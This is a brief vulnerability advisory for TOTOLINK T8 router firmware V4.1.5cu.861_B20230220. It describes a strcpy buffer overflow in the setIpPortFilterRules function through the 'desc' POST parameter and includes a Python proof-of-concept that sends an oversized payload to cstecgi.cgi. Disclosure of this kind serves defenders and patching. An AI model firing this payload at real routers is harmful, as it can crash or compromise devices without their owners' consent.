- Manufacturer's website information:https://www.totolink.net/
- Firmware download address :https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/222/ids/36.html
T8_Firmware V4.1.5cu.861_B20230220
In the T8_Firmware V4.1.5cu.861_B20230220 firmware has a buffer overflow vulnerability in the setIpPortFilterRules
function. The v9
variable receives the desc
parameter from a POST request. However, since the user can control the input of desc
, the strcpy
can cause a buffer overflow vulnerability.
import requests
url = "http://127.0.0.1/cgi-bin/cstecgi.cgi"
cookie = {"Cookie":"SESSION_ID=2:1721039211:2"}
data = {
"topicurl":"setIpPortFilterRules",
"addEffect":9,
"ip":"1",
"sPort":"1",
"ePort":"1",
"desc":"b"*0x1000,
}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)